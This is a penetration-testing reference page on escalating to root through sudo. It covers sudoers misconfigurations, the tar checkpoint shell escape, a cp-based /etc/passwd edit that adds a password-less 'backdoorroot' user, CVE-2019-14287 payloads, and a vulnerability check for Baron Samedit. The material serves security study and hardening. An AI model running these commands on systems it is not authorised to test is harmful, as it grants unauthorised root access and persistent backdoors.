SUDO

Theory

sudo (Super User DO) is a program for UNIX-like computer operating systems that allows users to run programs with the security privileges of another user (by default, the superuser).
Unlike the similar command su, users must, by default, supply their own password for authentication, rather than the password of the target user. After authentication, and if the configuration file, which is typically located at /etc/sudoers, permits the user access, the system invokes the requested command with the target user's privileges.
Sudo users are called sudoers ( ๐Ÿ˜ฏ I know right, big brains here ๐Ÿง  ). What sudoers are allowed to do is defined in the /etc/sudoers configuration file. This file, owned by root, is supposed to be 440 (read-only) and should only be edited with visudo, sudoedit or sudo -e.

Practice

There are many ways to escalate privileges by exploiting sudo, either by profiting from insecure configuration, or by exploiting the program's vulnerabilities.

Default configurations

The sudo -l command can be run by sudoers to check their sudo rights. The output reflects the /etc/sudoers configuration that applies to the user. It should like the following (default config for a new sudoer).
1
# Format is
2
User johnthesudoer may run the following commands on johncomputer:
3
(ALL : ALL) ALL
Copied!
For instance, this configuration allows the johnthesudoer user to run any privileged command as long as johnthesudoer's password is known. A privileged session can be obtained with sudo -i, sudo -s, sudo su or sudo <program>.

Living off the land

While the SUDO configuration can be hardened to restrict privileged execution to specific program, there are some that can be abused to bypass local security restrictions. This is called Living off the land.
1
User johnthesudoer may run the following commands on johncomputer:
2
(ALL : ALL) /bin/tar
Copied!
The configuration above only allows sudoer johnthesudoer to execute /bin/tar as root as long as johnthesudoer's password is known. The thing is tar is program that can be used to obtain a full session, hence bypassing the restrictions induced by sudoers configuration.
1
sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Copied!
Other examples can be found on the Living off the land note.
While some programs can be used to obtain a full shell, others can be used to induce changes on the system to grant root privileges, like /usr/bin/cp. The following commands are used to edit the /etc/passwd file to add a password-less user with root's uid and gid.
1
cp /etc/passwd /tmp/passwd.bak
2
echo "backdoorroot::0:0:Backdoor root:/root:/bin/bash" >> /tmp/passwd.bak
3
sudo /usr/bin/cp passwd.bak /etc/passwd
4
su -l backdoorroot
Copied!

CVE-2019-14287 (#-1)

With SUDO running version < 1.8.28, an attacker in control of a "runas ALL" sudoer account can bypass certain policy blacklists and session PAM modules by invoking sudo with a crafted user ID.
Exploiting the bug requires sudo privileges and being able to run commands with an arbitrary user ID. This means the user's sudoers entry has to have the special value ALL in the "runas" specifier (the yellow and green parts in the doodle above).
Vulnerable users can be found with the two commands below
1
grep -e '(\s*ALL\s*,\s*!root\s*)' /etc/sudoers
2
grep -e '(\s*ALL\s*,\s*\!#0\s*)' /etc/sudoers
Copied!
The vulnerability can be exploited with one of the following payloads
1
sudo -u#-1 sh -p
2
sudo -u#4294967295 sh -p
3
sudo -u#$((0xffffffff)) sh -p
Copied!
Some technical details to the vulnerability
Sudo uses the setresuid(2) and setreuid(2) system calls to change the user ID before running the command. So if you try to enter a negative user id -1 (or its 32-bit unsigned equivalent 4294967295), setresuid(2) and setreuid(2) cannot set a negative user id and you're left with the user id sudo is running with : 0.
Therefore sudo -u#-1 id -u or sudo -u#4294967295 id -u will actually return uid=0 and run command as root.
More info can be found hereโ€‹

CVE-2021-3156 (Baron Samedit)

With SUDO running version < 1.9.5p2, a Heap-based Buffer Overflow allows for privilege escalation to root via sudoedit -s and a command-line argument that ends with a single backslash character. To test if a system is vulnerable or not, the following command can be run as a non-root user.
1
sudoedit -s /
Copied!
Patched versions will throw a usage: help message while vulnerable ones will throw the following sudoedit: error.
1
$ sudoedit -s /
2
[sudo] password for user:
3
sudoedit: /: not a regular file
Copied!
This vulnerability can be exploited with this exploit, or this one.
More info about this vulnerability can be found here and here.

Resources

GTFOBins
Exploiting CVE-2019โ€“14287
Medium
CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit) | Qualys Security Blog
Qualys Security Blog
โ€‹
Last modified 2mo ago